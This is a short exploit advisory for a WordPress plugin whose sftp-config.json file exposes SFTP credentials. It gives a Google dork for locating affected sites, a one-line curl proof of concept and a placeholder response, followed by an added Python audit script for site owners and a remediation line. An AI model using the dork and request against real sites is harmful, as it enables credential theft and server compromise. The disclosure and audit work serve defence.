# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4

* PoC:

$ curl http:///wp-content/plugins/limolabs-icabbi/sftp-config.json

* Response:

...
"host": "1.3.3.7",
"user": "foo",
"password": "bar",
"port": "22",
...
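
For the site owner's side of this disclosure, an added example (not part of the original advisory or the plugin's code): a Python audit that walks a local webroot for sftp-config.json files and reports which credential keys each one contains, without printing the values. The function names, the sample tree and the commented-out line are constructed for illustration; matching is line-based on the assumption that the deployed file may not be strict JSON.

```python
import os
import re
import tempfile

# Keys shown in the advisory's response excerpt.
KEYS = ("host", "user", "password", "port")
# Line-anchored so commented-out entries (// "password": ...) are ignored.
KEY_RE = re.compile(r'^[ \t]*"(%s)"\s*:\s*"([^"]*)"' % "|".join(KEYS), re.M)


def audit_webroot(webroot, filename="sftp-config.json"):
    """Find every `filename` under webroot; report keys present, not values."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        if filename not in files:
            continue
        path = os.path.join(dirpath, filename)
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = dict(KEY_RE.findall(fh.read()))
        findings.append({
            "path": os.path.relpath(path, webroot),
            "keys": sorted(found),
            "has_password": bool(found.get("password")),
            # Other-readable bit: the web server user can usually read it too.
            "world_readable": bool(os.stat(path).st_mode & 0o004),
        })
    return findings


def build_sample(root):
    """Constructed tree mirroring the plugin path and response in the advisory."""
    plugin = os.path.join(root, "wp-content", "plugins", "limolabs-icabbi")
    os.makedirs(plugin)
    target = os.path.join(plugin, "sftp-config.json")
    with open(target, "w", encoding="utf-8") as fh:
        fh.write('{\n    "host": "1.3.3.7",\n    "user": "foo",\n'
                 '    // "password": "commented-out",\n'
                 '    "password": "bar",\n    "port": "22",\n}\n')
    os.chmod(target, 0o644)
    return target


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        for finding in audit_webroot(root):
            print(finding)
```

Any finding with has_password set means the file should be removed from the deployed tree and the SFTP credentials it holds rotated.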